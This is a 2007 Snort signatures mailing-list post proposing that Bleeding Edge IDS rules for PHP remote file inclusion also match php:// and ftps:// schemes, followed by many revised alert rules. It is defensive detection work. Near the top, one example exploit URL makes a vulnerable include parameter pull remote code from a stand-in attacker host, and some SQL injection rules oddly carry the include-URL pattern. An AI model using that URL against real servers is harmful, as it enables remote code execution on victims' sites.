[Snort-sigs] PHP remote include sigs (part II)

Jamie Riden jamie.riden at ...2420...
Wed May 30 06:04:45 EDT 2007


Hi there,

[part II - bleeding rules this time]

A lot of the PHP remote file include sigs have matches like
pcre:"/=\s*(https?|ftp)\:\//Ui" -

It turns out that PHP also ships with the following URL schemes
enabled by default:
php://filter/resource=http://www.example.com and
ftps://ftp.example.com - a brief test seems to confirm that these work
just as well as http for file inclusion.

ie. exploit URL would be something like :
http://www.victim.com/vuln.php?include=php://filter/resource=http://www.evil.com

In which case, you'd need to change the matches to
pcre:"/=\s*(https?|ftps?|php)\:\//Ui" throughout to catch all the
default exploitable conditions. I have tested this briefly, but a
sanity check would be welcome:

cheers,
 Jamie

alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Aardvark Topsites PHP CONFIG[PATH] Remote
File Include Attempt"; flow:established,to_server;
uricontent:"CONFIG[PATH]="; nocase; pcre:"/(join|lostpw)\.php\?/Ui";
pcre:"/&CONFIG\x5bpath\x5d=(php|ftps?|https?)\:/Ui";
reference:cve,CVE-2006-2149; reference:url,www.osvdb.org/25158;
classtype:web-application-attack; sid:2002901; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CGX Remote Inclusion Attempt -- mtdialogo.php
pathCGX"; flow:established,to_server; uricontent:"/mtdialogo.php?";
nocase; uricontent:"pathCGX="; nocase;
pcre:"/=\s*(php|https?|ftps?)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2611;
reference:url,www.milw0rm.com/exploits/3874; sid:2003726; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CGX Remote Inclusion Attempt -- ltdialogo.php
pathCGX"; flow:established,to_server; uricontent:"/ltdialogo.php?";
nocase; uricontent:"pathCGX="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2611;
reference:url,www.milw0rm.com/exploits/3874; sid:2003727; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CGX Remote Inclusion Attempt -- login.php
pathCGX"; flow:established,to_server; uricontent:"/login.php?";
nocase; uricontent:"pathCGX="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2611;
reference:url,www.milw0rm.com/exploits/3874; sid:2003729; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CGX Remote Inclusion Attempt -- logingecon.php
pathCGX"; flow:established,to_server;
uricontent:"/inc/logingecon.php?"; nocase; uricontent:"pathCGX=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2611;
reference:url,www.milw0rm.com/exploits/3874; sid:2003728; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CJG Explorer Remote Inclusion Attempt --
pcltrace.lib.php g_pcltar_lib_dir"; flow:established,to_server;
uricontent:"/pcltrace.lib.php?"; nocase;
uricontent:"g_pcltar_lib_dir="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2660;
reference:url,www.milw0rm.com/exploits/3915; sid:2003737; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt --
stylesheet.php templateid SELECT"; flow:established,to_server;
uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid=";
nocase; uricontent:"SELECT"; nocase; uricontent:"FROM"; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2473;
reference:url,www.securityfocus.com/bid/23753; sid:2003794; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt --
stylesheet.php templateid UNION SELECT"; flow:established,to_server;
uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid=";
nocase; uricontent:"UNION"; nocase; uricontent:"SELECT"; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2473;
reference:url,www.securityfocus.com/bid/23753; sid:2003795; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt --
stylesheet.php templateid INSERT"; flow:established,to_server;
uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid=";
nocase; uricontent:"INSERT"; nocase; uricontent:"INTO"; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2473;
reference:url,www.securityfocus.com/bid/23753; sid:2003796; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt --
stylesheet.php templateid DELETE"; flow:established,to_server;
uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid=";
nocase; uricontent:"DELETE"; nocase; uricontent:"FROM"; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2473;
reference:url,www.securityfocus.com/bid/23753; sid:2003865; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt --
stylesheet.php templateid ASCII"; flow:established,to_server;
uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid=";
nocase; uricontent:"ASCII("; nocase; uricontent:"SELECT"; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2473;
reference:url,www.securityfocus.com/bid/23753; sid:2003797; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB CMS Made Simple SQL Injection Attempt --
stylesheet.php templateid UPDATE"; flow:established,to_server;
uricontent:"/stylesheet.php?"; nocase; uricontent:"templateid=";
nocase; uricontent:"UPDATE"; nocase; uricontent:"SET"; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2473;
reference:url,www.securityfocus.com/bid/23753; sid:2003798; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE Cacti Input Validation Attack";
flow:established,to_server; content:"GET"; depth:3; nocase;
pcre:"/(config_settings|top_graph_header)\.php\?.*=(https?|ftps?|php)\:\//Ui";
classtype:web-application-activity; reference:url,www.cacti.net;
reference:url,www.idefense.com/application/poi/display?id=265&type=vulnerabilities;
reference:url,www.idefense.com/application/poi/display?id=266&type=vulnerabilities;
sid:2002129; rev:6;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB DynamicPAD Remote Inclusion Attempt --
dp_logs.php HomeDir"; flow:established,to_server;
uricontent:"/dp_logs.php?"; nocase; uricontent:"HomeDir="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2527;
reference:url,milw0rm.com/exploits/3868; sid:2003679; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB DynamicPAD Remote Inclusion Attempt --
index.php HomeDir"; flow:established,to_server;
uricontent:"/index.php?"; nocase; uricontent:"HomeDir="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2527;
reference:url,milw0rm.com/exploits/3868; sid:2003680; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB E-Gads Remote Inclusion Attempt -- common.php
locale"; flow:established,to_server; uricontent:"/common.php?";
nocase; uricontent:"locale="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2521;
reference:url,www.milw0rm.com/exploits/3846; sid:2003682; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Firefly Remote Inclusion Attempt -- config.php
DOCUMENT_ROOT"; flow:established,to_server;
uricontent:"/modules/admin/include/config.php?"; nocase;
uricontent:"DOCUMENT_ROOT="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2460;
reference:url,www.frsirt.com/english/advisories/2007/1554;
sid:2003690; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Gnopaster Common.php remote file include";
flow:established,to_server; uricontent:"/includes/common.php"; nocase;
pcre:"/root_path=\s*(ftps?|https?|php)\:\//Ui";
reference:bugtraq,18180; classtype:web-application-attack;
sid:2003333; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB LaVague Remote Inclusion Attempt --
printbar.php views_path"; flow:established,to_server;
uricontent:"/views/print/printbar.php?"; nocase;
uricontent:"views_path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2607;
reference:url,www.milw0rm.com/exploits/3870; sid:2003716; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Generic membreManager.php remote file
include"; flow:established,to_server;
uricontent:"/membres/membreManager.php"; nocase;
pcre:"/include_path=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,22287; classtype:web-application-attack;
sid:2003331; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB miplex2 Remote Inclusion SmartyFU.class.php
system"; flow:established,to_server;
uricontent:"/lib/smarty/SmartyFU.class.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2608;
reference:url,www.milw0rm.com/exploits/3878; sid:2003717; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Open Translation Engine Remote Inclusion
Attempt -- header.php ote_home"; flow:established,to_server;
uricontent:"/skins/header.php?"; nocase; uricontent:"ote_home=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2676;
reference:url,www.milw0rm.com/exploits/3838; sid:2003741; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPChess Remote Inclusion Attempt --
language.php config"; flow:established,to_server;
uricontent:"/includes/language.php?"; nocase; uricontent:"config=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2677;
reference:url,www.milw0rm.com/exploits/3837; sid:2003742; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPChess Remote Inclusion Attempt --
layout_admin_cfg.php Root_Path"; flow:established,to_server;
uricontent:"/layout_admin_cfg.php?"; nocase; uricontent:"Root_Path=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2677;
reference:url,www.milw0rm.com/exploits/3837; sid:2003743; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPChess Remote Inclusion Attempt --
layout_cfg.php Root_Path"; flow:established,to_server;
uricontent:"/layout_cfg.php?"; nocase; uricontent:"Root_Path=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2677;
reference:url,www.milw0rm.com/exploits/3837; sid:2003744; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPChess Remote Inclusion Attempt --
layout_t_top.php Root_Path"; flow:established,to_server;
uricontent:"/skins/phpchess/layout_t_top.php?"; nocase;
uricontent:"Root_Path="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2677;
reference:url,www.milw0rm.com/exploits/3837; sid:2003745; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPEventMan remote file include";
flow:established,to_server; uricontent:"/controller/"; nocase;
pcre:"/(text\.ctrl\.php|common\.function\.php)\?level=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,22358; classtype:web-application-attack;
sid:2003372; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPFirstPost Remote Inclusion Attempt
block.php Include"; flow:established,to_server;
uricontent:"/block.php?"; nocase; uricontent:"Include="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2665;
reference:url,www.milw0rm.com/exploits/3906; sid:2003740; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPHtmlLib Remote Inclusion Attempt --
widget8.php phphtmllib"; flow:established,to_server;
uricontent:"/examples/widget8.php?"; nocase; uricontent:"phphtmllib=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2614;
reference:url,www.securityfocus.com/archive/1/archive/1/467837/100/0/threaded;
sid:2003730; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPLojaFacil Remote Inclusion Attempt --
ftp.php path_local"; flow:established,to_server;
uricontent:"/ftp.php?"; nocase; uricontent:"path_local="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2615;
reference:url,www.milw0rm.com/exploits/3875; sid:2003731; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPLojaFacil Remote Inclusion Attempt --
db.php path_local"; flow:established,to_server;
uricontent:"/libs/db.php?"; nocase; uricontent:"path_local="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2615;
reference:url,www.milw0rm.com/exploits/3875; sid:2003732; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPLojaFacil Remote Inclusion Attempt --
libs_ftp.php path_local"; flow:established,to_server;
uricontent:"/libs/ftp.php?"; nocase; uricontent:"path_local="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2615;
reference:url,www.milw0rm.com/exploits/3875; sid:2003733; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB phpMyPortal Remote Inclusion Attempt --
articles.inc.php GLOBALS[CHEMINMODULES]"; flow:established,to_server;
uricontent:"/inc/articles.inc.php?"; nocase;
uricontent:"GLOBALS[CHEMINMODULES]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2594;
reference:url,www.milw0rm.com/exploits/3879; sid:2003703; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPSecurityAdmin Remote Inclusion Attempt --
logout.php PSA_PATH"; flow:established,to_server;
uricontent:"/include/logout.php?"; nocase; uricontent:"PSA_PATH=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2628;
reference:url,www.securityfocus.com/bid/23801; sid:2003735; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (msg:
"BLEEDING-EDGE EXPLOIT WEB PHP remote file include exploit attempt";
flow: to_server,established; content:"GET"; nocase; depth:3;
uricontent:".php?"; nocase; pcre:"/=(https?|ftps?|php)\:\//Ui";
nocase; content:"cmd="; nocase; within: 100; classtype:
attempted-admin; sid: 2001810; rev:10; )
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS (
msg:"BLEEDING-EDGE WEB PHP PHPNuke Remote File Inclusion Attempt";
flow:established,to_server; uricontent:"/iframe.php"; nocase;
uricontent:"file="; nocase; pcre:"/file=\s*(ftps?|php|https?)\:\//Ui";
reference:url,www.zone-h.org/en/advisories/read/id=8694/;
classtype:web-application-attack; sid:2002800; rev:3; )
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Turbulence Remote Inclusion Attempt --
turbulence.php GLOBALS[tcore]"; flow:established,to_server;
uricontent:"/user/turbulence.php?"; nocase;
uricontent:"GLOBALS[tcore]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2504;
reference:url,www.securityfocus.com/bid/23580; sid:2003683; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Web Calendar Remote File Inclusion
Attempt"; flow:established,to_server;
uricontent:"/send_reminders.php"; nocase;
pcre:"/includedir=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,14651; reference:cve,2005-2717;
classtype:web-application-attack; sid:2002898; rev:4;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHPtree Remote Inclusion Attempt -- cms2.php
s_dir"; flow:established,to_server;
uricontent:"/plugin/HP_DEV/cms2.php?"; nocase; uricontent:"s_dir=";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2573;
reference:url,www.milw0rm.com/exploits/3860; sid:2003693; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_image_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/image/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003672; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_liens_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/liens/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003673; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_liste_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/liste/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003674; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_special_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/special/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003675; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PMECMS Remote Inclusion Attempt --
mod_texte_index.php config[pathMod]"; flow:established,to_server;
uricontent:"/mod/texte/index.php?"; nocase;
uricontent:"config[pathMod]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2540;
reference:url,www.milw0rm.com/exploits/3852; sid:2003676; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt -
Headerfile.php System"; flow:established,to_server;
uricontent:"/blocks/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003660; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
latest_files.php System"; flow:established,to_server;
uricontent:"/files/blocks/latest_files.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003661; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
latest_posts.php System"; flow:established,to_server;
uricontent:"/forums/blocks/latest_posts.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003662; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
groups_headerfile.php System"; flow:established,to_server;
uricontent:"/groups/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003663; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
filters_headerfile.php System"; flow:established,to_server;
uricontent:"/filters/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003664; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
links.php System"; flow:established,to_server;
uricontent:"/links/blocks/links.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003665; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
menu_headerfile.php System"; flow:established,to_server;
uricontent:"/menu/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003666; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
latest_news.php System"; flow:established,to_server;
uricontent:"/news/blocks/latest_news.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003667; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
settings_headerfile.php System"; flow:established,to_server;
uricontent:"/settings/headerfile.php?"; nocase; uricontent:"system[";
nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003668; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Persism CMS Remote Inclusion Attempt --
users_headerfile.php System"; flow:established,to_server;
uricontent:"/modules/users/headerfile.php?"; nocase;
uricontent:"system["; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2545;
reference:url,www.milw0rm.com/exploits/3853; sid:2003681; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Pixaria Gallery Remote Inclusion Attempt --
psg.smarty.lib.php cfg[sys][base_path]"; flow:established,to_server;
uricontent:"/psg.smarty.lib.php?"; nocase;
uricontent:"cfg[sys][base_path]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2458;
reference:url,www.frsirt.com/english/advisories/2007/1390;
sid:2003691; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Pixaria Gallery Remote Inclusion
class.Smarty.php cfg[sys][base_path]"; flow:established,to_server;
uricontent:"/resources/includes/class.Smarty.php?"; nocase;
uricontent:"cfg[sys][base_path]="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2457;
reference:url,www.milw0rm.com/exploits/3733; sid:2003702; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Plume CMS prepend.php Remote File Inclusion
attempt"; flow:to_server,established; uricontent:"/prepend.php";
nocase; content:"_px_config[manager_path]="; nocase;
pcre:"/_px_config\x5bmanager_path\x5d=(https?|php|ftps?)\:/i";
classtype:web-application-attack; reference:cve,CVE-2006-0725;
reference:bugtraq,16662; reference:nessus,20972; sid:2002815; rev:4;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB PHP Portail Includes.php remote file include";
flow:established,to_server; uricontent:"/includes/includes.php";
nocase; pcre:"/site_path=\s*(ftps?|php|https?)\:\//Ui";
reference:bugtraq,22361; classtype:web-application-attack;
sid:2003371; rev:2;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Simple PHP Script Gallery Remote Inclusion
index.php gallery"; flow:established,to_server;
uricontent:"/index.php?"; nocase; uricontent:"gallery="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2679;
reference:url,www.securityfocus.com/bid/23534; sid:2003746; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB TopTree Remote Inclusion Attempt --
tpl_message.php right_file"; flow:established,to_server;
uricontent:"/templates/default/tpl_message.php?"; nocase;
uricontent:"right_file="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2544;
reference:url,www.milw0rm.com/exploits/3854; sid:2003669; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB Tropicalm Remote Inclusion Attempt --
dosearch.php RESPATH"; flow:established,to_server;
uricontent:"/dosearch.php?"; nocase; uricontent:"RESPATH="; nocase;
pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2530;
reference:url,www.milw0rm.com/exploits/3865; sid:2003678; rev:3;)
alert tcp $EXTERNAL_NET any -> $HTTP_SERVERS $HTTP_PORTS
(msg:"BLEEDING-EDGE WEB TurnKeyWebTools Remote Inclusion Attempt --
payflow_pro.php abs_path"; flow:established,to_server;
uricontent:"/include/payment/payflow_pro.php?"; nocase;
uricontent:"abs_path="; nocase; pcre:"/=\s*(https?|ftps?|php)\:\//Ui";
classtype:web-application-attack; reference:cve,CVE-2007-2474;
